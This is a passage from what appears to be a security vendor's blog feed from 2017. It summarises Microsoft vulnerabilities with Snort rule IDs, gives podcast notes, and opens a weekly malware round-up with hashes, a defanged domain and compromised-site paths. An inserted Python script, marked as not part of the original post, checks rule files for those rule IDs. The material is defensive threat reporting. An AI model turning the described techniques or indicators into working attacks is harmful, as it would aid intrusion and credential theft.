They can be exploited by a user opening a specially crafted Office document and can result in the attacker gaining full control of the affected system.&lt;br /&gt;&lt;h4 id="h.d0s8jre8ln5i"&gt;CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285&lt;/h4&gt;These are information disclosure vulnerabilities in Windows Uniscribe related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.bo1p344p5bt2"&gt;CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows GDI functionality that result in disclosure of the contents of memory. They can be exploited by a user opening a specially crafted document or by convincing a user to access an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.rc19ikpi9rkx"&gt;CVE-2017-0295&lt;/h4&gt;This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\Users\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.&lt;br /&gt;&lt;h4 id="h.ukhf4bu3xpr9"&gt;CVE-2017-0296&lt;/h4&gt;This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by a local attacker executing a specially crafted application to elevate privileges.&lt;br /&gt;&lt;h4 id="h.9qf2te7i5b1f"&gt;CVE-2017-0297&lt;/h4&gt;This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. 
This is exploitable by a local attacker executing a specially crafted application to elevate privileges.&lt;br /&gt;&lt;h4 id="h.lotk64hjlvjg"&gt;CVE-2017-0298&lt;/h4&gt;This is a privilege escalation vulnerability in Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to properly authenticate a client. Exploitation occurs when an attacker who is logged into the system executes a specially crafted application that exploits the vulnerability after another user has logged on to the same system via Terminal Services or Fast User Switching.&lt;br /&gt;&lt;h4 id="h.v8sfr1cbca79"&gt;CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address, allowing the attacker to retrieve information that could potentially be used to bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.&lt;br /&gt;&lt;h4 id="h.tyo4moefstll"&gt;CVE-2017-8460&lt;/h4&gt;This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.&lt;br /&gt;&lt;h4 id="h.wflwqpqh38w8"&gt;CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468&lt;/h4&gt;These are use-after-free vulnerabilities that can result in privilege escalation. They are specifically triggered when Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.&lt;br /&gt;&lt;h4 id="h.loqaz6h61hfq"&gt;CVE-2017-8469 / CVE-2017-8470&lt;/h4&gt;These are information disclosure vulnerabilities related to the way the Windows kernel improperly initializes objects in memory. 
This can be triggered by an authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 id="h.ahczr2jz5r7j"&gt;CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 id="h.r3dx3kkvmfcz"&gt;CVE-2017-8493&lt;/h4&gt;This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.&lt;br /&gt;&lt;h4 id="h.p3llcf1m8rq5"&gt;CVE-2017-8494&lt;/h4&gt;This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 id="h.6462oxbspxq3"&gt;CVE-2017-8507&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. 
This can be exploited by opening a specially crafted email message.&lt;br /&gt;&lt;h4 id="h.y14yeg9hmtps"&gt;CVE-2017-8508&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.&lt;br /&gt;&lt;h4 id="h.kqtny2lmhpy4"&gt;CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.&lt;br /&gt;&lt;h4 id="h.o1ru3izc54qs"&gt;CVE-2017-8514&lt;/h4&gt;This is a reflected cross-site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server, and the script will run in the security context of the current user. The request could be delivered either via an email message or through a specially crafted URL on a website.&lt;br /&gt;&lt;h4 id="h.3mlt339eyw7b"&gt;CVE-2017-8515&lt;/h4&gt;This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.&lt;br /&gt;&lt;h4 id="h.z2c1qk9dh3d8"&gt;CVE-2017-8519&lt;/h4&gt;This is a remote code execution vulnerability in Internet Explorer related to objects in memory being improperly accessed. The resulting corruption of memory can result in arbitrary code execution. 
This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.mv8eybhqa5pd"&gt;CVE-2017-8521&lt;/h4&gt;This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.5ffctj19wxm5"&gt;CVE-2017-8523&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply the Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when the user visits a specially crafted website.&lt;br /&gt;&lt;h4 id="h.g14jbgu5zebf"&gt;CVE-2017-8529&lt;/h4&gt;This is an information disclosure vulnerability that affects both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.&lt;br /&gt;&lt;h4 id="h.e6il8xov2qu5"&gt;CVE-2017-8530&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies, potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when the user visits a specially crafted website.&lt;br /&gt;&lt;h4 id="h.yo9w4ohnsd64"&gt;CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows GDI component related to improper disclosure of the contents of its memory. 
They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.i2sjbys230jf"&gt;CVE-2017-8534&lt;/h4&gt;This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability, including having the user open a specially crafted document or having them visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.1jm00kmnvkvp"&gt;CVE-2017-8544&lt;/h4&gt;This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;h4 id="h.x5xrllpbrgrq"&gt;CVE-2017-8545&lt;/h4&gt;This is a spoofing vulnerability in Microsoft Office for Mac related to a failure to properly sanitize HTML or otherwise treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt, which could provide the attacker with a user's authentication information or login credentials.&lt;br /&gt;&lt;h4 id="h.vm3l0n9yt3yj"&gt;CVE-2017-8547&lt;/h4&gt;This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupted memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.&lt;br /&gt;&lt;h4 id="h.ifsntniixnev"&gt;CVE-2017-8550&lt;/h4&gt;This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Server related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business or Lync context, including opening a web page using the default browser or opening another messaging session with another user. 
Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.&lt;br /&gt;&lt;h4 id="h.5idaqenq3iuk"&gt;CVE-2017-8551&lt;/h4&gt;This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.&lt;br /&gt;&lt;h4 id="h.dazxtzgr79i4"&gt;CVE-2017-8555&lt;/h4&gt;This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.&lt;br /&gt;&lt;h3 id="h.x43pguv8bvah"&gt;Coverage&lt;/h3&gt;In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;17042&lt;br /&gt;24500&lt;br /&gt;43155-43166&lt;br /&gt;43169-43176&lt;div class="feedflare"&gt;
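As an added example that is not part of the original post: the Coverage section above lists rule SIDs as single numbers and inclusive ranges. The Python below expands that list and checks it against a Snort rules file, reporting which listed SIDs are enabled, which are present but commented out (disabled), and which are absent. The rules file content is a constructed sample with made-up rule bodies, not real Talos rule text; only the SID numbers come from the post.

```python
import re

# SIDs exactly as listed in the Coverage section above; ranges are inclusive.
COVERAGE_SIDS_TEXT = "17042 24500 43155-43166 43169-43176"

# Matches the sid option of a Snort rule, e.g. "sid:43155;"
SID_RE = re.compile(r"\bsid\s*:\s*(\d+)\s*;")

# Constructed sample ruleset (made-up rule bodies, not real Talos rules):
# one listed SID is present and enabled, one is commented out, the rest are absent.
SAMPLE_RULES = """\
# constructed sample ruleset for the example, not real rule content
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"SAMPLE rule A"; flow:to_client,established; sid:17042; rev:3;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"SAMPLE rule B"; flow:to_client,established; sid:43155; rev:1;)
# alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"SAMPLE rule C"; flow:to_client,established; sid:43156; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"SAMPLE unrelated rule"; sid:99999; rev:1;)
"""


def expand_sids(text):
    """Expand whitespace-separated 'N' and 'N-M' tokens into a set of ints."""
    sids = set()
    for token in text.split():
        if "-" in token:
            lo, hi = (int(part) for part in token.split("-", 1))
            sids.update(range(lo, hi + 1))
        else:
            sids.add(int(token))
    return sids


def parse_ruleset(rules_text):
    """Map sid -> enabled for every rule line; a leading '#' marks a disabled rule."""
    state = {}
    for line in rules_text.splitlines():
        stripped = line.strip()
        match = SID_RE.search(stripped)
        if not match:
            continue  # blank lines and comments without a sid option
        sid = int(match.group(1))
        enabled = not stripped.startswith("#")
        # A SID that appears more than once counts as enabled if any copy is.
        state[sid] = state.get(sid, False) or enabled
    return state


def check_coverage(rules_text, sids_text=COVERAGE_SIDS_TEXT):
    """Return the listed SIDs split into enabled, disabled and missing."""
    wanted = expand_sids(sids_text)
    state = parse_ruleset(rules_text)
    return {
        "enabled": sorted(s for s in wanted if state.get(s)),
        "disabled": sorted(s for s in wanted if s in state and not state[s]),
        "missing": sorted(s for s in wanted if s not in state),
    }


if __name__ == "__main__":
    result = check_coverage(SAMPLE_RULES)
    for status in ("enabled", "disabled", "missing"):
        print(f"{status:8s} {len(result[status]):3d}  {result[status]}")
```

To run this against a deployed sensor, read the rules file(s) you actually load and pass their text to check_coverage. A SID reported as missing may simply not be in the rule release you have downloaded yet, so compare against the current release before treating it as a gap.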
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtF1o6PBkRM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-13T16:50:20.978-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/ms-tuesday.html</feedburner:origLink></item><item><title>BWT EP6: Enter the Talos, But Please Use a Unique Password</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/7o8j6in7k8I/bwt-ep6-enter-talos-but-please-use.html</link><author>noreply@blogger.com (Mitch Neff)</author><pubDate>Tue, 13 Jun 2017 13:05:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-5419674200920519271</guid><description>&lt;br /&gt;&lt;h4&gt;LISTEN HERE:&lt;/h4&gt;Listen via &lt;a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410"&gt;iTunes&lt;/a&gt;&lt;br /&gt;Listen directly on the &lt;a href="https://www.talosintelligence.com/podcasts"&gt;Talos Podcasts&lt;/a&gt; page.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="630" data-original-width="1200" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s1600/facebook_timeline_podcast.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Episode Notes:&lt;a name='more'&gt;&lt;/a&gt;&lt;/h3&gt;The team discusses how to get into threat intel and join a team like Talos. There are many routes to enter the Talos, but no exits. Seriously, they won’t let me leave. 
Passwords, vaults, and other access controls are discussed more in-depth as well. &lt;br /&gt;Mitch opens the show discussing poor life choices like drinking with folks from Norn Iron, Nigel divulges details of his life-long obsession with men in shorts, Matt forces his team to endure war games in suburban Baltimore, Joel threatens to have a mental breakdown over buzzwords, and Craig turns his roundtable segment into a full topic...shocking, I know.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Feedback question:&amp;nbsp;&lt;/h4&gt;What SHOULD Nigel be tweeting?&lt;br /&gt;Tweet us &lt;a href="http://twitter.com/talossecurity" target="_blank"&gt;@TalosSecurity&lt;/a&gt;, or email us at &lt;a href="mailto:BeersWithTalos@cisco.com"&gt;BeersWithTalos@cisco.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Topic Table:&lt;/h3&gt;12:50 - How do you get into security research&lt;br /&gt;16:14 - Being more than wizards in hoodies&lt;br /&gt;22:30 - Who effing tweeted that?&lt;br /&gt;33:11 - Internet of Broken Things&lt;br /&gt;37:33 - Better Passwords, Managers, and TFA - tips, tricks, and tirades&lt;br /&gt;55:33 - Parting shots and pithy quotables&lt;br /&gt;&lt;br /&gt;==========&lt;br /&gt;&lt;h4&gt;Featuring:&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="http://twitter.com/Security_Craig" target="_blank"&gt;Craig Williams&lt;/a&gt;, &lt;a href="http://twitter.com/JoelEsler" target="_blank"&gt;Joel Esler&lt;/a&gt;, &lt;a href="http://twitter.com/kpyke" target="_blank"&gt;Matt Olney&lt;/a&gt;,&amp;nbsp;and &lt;a href="http://twitter.com/EnglishLFC" target="_blank"&gt;Nigel Houghton&lt;/a&gt;&lt;br /&gt;Hosted by &lt;a href="http://twitter.com/MitchNeff" target="_blank"&gt;Mitch Neff&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Find all episodes:&lt;/h4&gt;&lt;a href="http://cs.co/talospodcast"&gt;http://cs.co/talospodcast&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Subscribe via iTunes (and leave a review!)&lt;/h4&gt;&lt;a href="http://cs.co/talositunes" 
target="_blank"&gt;http://cs.co/talositunes&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Subscribe to the Threat Source newsletter:&lt;/h4&gt;&lt;a href="http://cs.co/talosupdate"&gt;http://cs.co/talosupdate&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Follow Talos on Twitter:&lt;/h4&gt;&lt;a href="http://cs.co/talostwitter"&gt;http://cs.co/talostwitter&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Give us your feedback and suggestions for topics:&lt;/h4&gt;&lt;a href="mailto:beerswithtalos@cisco.com" target="_blank"&gt;beerswithtalos@cisco.com &lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/7o8j6in7k8I" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-13T16:07:54.609-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAII/xdw7Jf0Fh5M0xh5ZG5wd3n1C_ByQunDJACLcBGAs/s72-c/facebook_timeline_podcast.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/bwt-ep6-enter-talos-but-please-use.html</feedburner:origLink></item><item><title>Threat Round-up for June 2 - June 9</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/PiuJF_Sg6Qw/threat-roundup-0602-0609.html</link><category>AMP</category><category>Coverage</category><category>Snort</category><category>Threat Round-up</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 09 Jun 2017 11:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4898150231893747583</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 02 and June 09. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. 
For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.PonyVariant-6326202-1&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This dropper launches malware that appears to be based on the leaked Pony Loader source code. It attempts to evade detection by injecting itself twice and deleting itself via a cmd.exe process. It also contacts compromised WordPress websites to download additional files and attempts to steal FTP login credentials.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.Valyria.6327969.0&lt;/b&gt;&lt;br /&gt;VB Macro&lt;br /&gt;This signature detects the initial stage of the Valyria trojan. Detecting the macro, which is distributed in Microsoft Word documents, stops the infection before the trojan's data-stealing stage runs.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Loader-6328419-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This malware belongs to the trojan/downloader family and installs additional malware. It also appears capable of spying on the victim. It performs process injection, including into a newly spawned explorer process, and contains extensive anti-debugging, VM detection, and other protections.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Sivis-1&lt;/b&gt;&lt;br /&gt;File infector&lt;br /&gt;Sivis is a file infector that replaces files on the file system with executables containing copies of itself.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Worm.Fadok-6328944-0&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Win.Worm.Fadok drops several files; %AppData%\RAC\mls.exe and %AppData%\RAC\svcsc.exe are copies of the malware that are configured to start automatically when Windows starts. The worm also drops and opens a Word document. 
It connects to the domain wxanalytics[.]ru.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Qakbot-6327689-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Qakbot is a sophisticated trojan primarily targeting personal information such as banking credentials. Read more about it in our blog &lt;a href="http://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html"&gt;post&lt;/a&gt;.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Downloader.Generic-6327950-1&lt;/b&gt;&lt;br /&gt;Doc downloader&lt;br /&gt;As document-based downloaders remain a popular method of delivering malware, their obfuscation methods continue to evolve. Recently, we encountered a series of Doc downloaders that use two scripts to download the final binary. The first is an embedded macro that removes a widely used obfuscation delimiter and writes the resulting JS code to disk. The JS code is then executed via WScript.exe to download the binary, but static analysis is still hindered because most of the code is processed by a string deobfuscation function that relies on single-character lookups from a master string.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Keybase-6328970-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;KeyBase is a trojan that can be used to capture screenshots, keystrokes, and other pieces of system information.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Siggen-6261194-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Siggen is a malware family with anti-debugging and anti-VM capabilities to hinder static and dynamic analysis. The sample drops a file in a temporary directory that is deleted once it has been loaded and the second stage has executed.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Image.Dropper.PhishingLure&lt;/b&gt;&lt;br /&gt;Social engineering document technique&lt;br /&gt;These documents display an icon and text lure to encourage users to click and activate the icon. 
When the icon is triggered, the malicious code runs.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Win.Dropper.PonyVariant-6326202-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&amp;lt;compromised WordPress website&amp;gt;/images/wp/wp[.]php&lt;/li&gt;&lt;li&gt;&amp;lt;compromised WordPress website&amp;gt;/wp-includes/images/wp/wp[.]php&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb&lt;/li&gt;&lt;li&gt;50733aaab0b6ca4210df15017f51bb576c84fea2cbeb0912dd40a32056cd3c1b&lt;/li&gt;&lt;li&gt;4fe60f488f45f914edb650cc2e248d156ad8b257b610ad4848b1c245f38053e3&lt;/li&gt;&lt;li&gt;24558ad4b3a745c24a2dd42c73800ccfcd0c10dc17c67d83f3dcb3a4e479d46c&lt;/li&gt;&lt;li&gt;21b260fc6d38b2061263f66f3efd71116adbc75b95f57d424b079ecc1c4e5a02&lt;/li&gt;&lt;li&gt;c35c5adf85410ad3a90804dfe053a0b6f53bef8c024898361a6c931c3598317e&lt;/li&gt;&lt;li&gt;416d71ce82336aa2dda064e6ba93a555ccf46c7ae2ad1faba379513965d9d485&lt;/li&gt;&lt;li&gt;81ee12d8f93c5b7574a1d797261f275e9b61f5ebd73ac836a68df3a18ef31c93&lt;/li&gt;&lt;li&gt;b42d5092e2fa54a8312c4f534b9c1d10ff714241a8fc3e3a3f44c8870a1fdc4f&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s1600/no-umbrella.png" imageanchor="1" 
style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s1600/no-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-_WiQLJmoLaU/WTrUUOopCZI/AAAAAAAABDI/6cKOa29-4ogllZQHg-2sAuG-UOUd_AS8QCLcB/s1600/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="273" src="https://3.bp.blogspot.com/-_WiQLJmoLaU/WTrUUOopCZI/AAAAAAAABDI/6cKOa29-4ogllZQHg-2sAuG-UOUd_AS8QCLcB/s400/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-nqvv5qFpo7Y/WTrUW8G7_yI/AAAAAAAABDM/OTnmyXX8dBQdiPlrXj9rpieqZlYDw64PgCLcB/s1600/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1059" data-original-width="1237" height="341" src="https://1.bp.blogspot.com/-nqvv5qFpo7Y/WTrUW8G7_yI/AAAAAAAABDM/OTnmyXX8dBQdiPlrXj9rpieqZlYDw64PgCLcB/s400/47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Macro.Valyria.6327969.0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br 
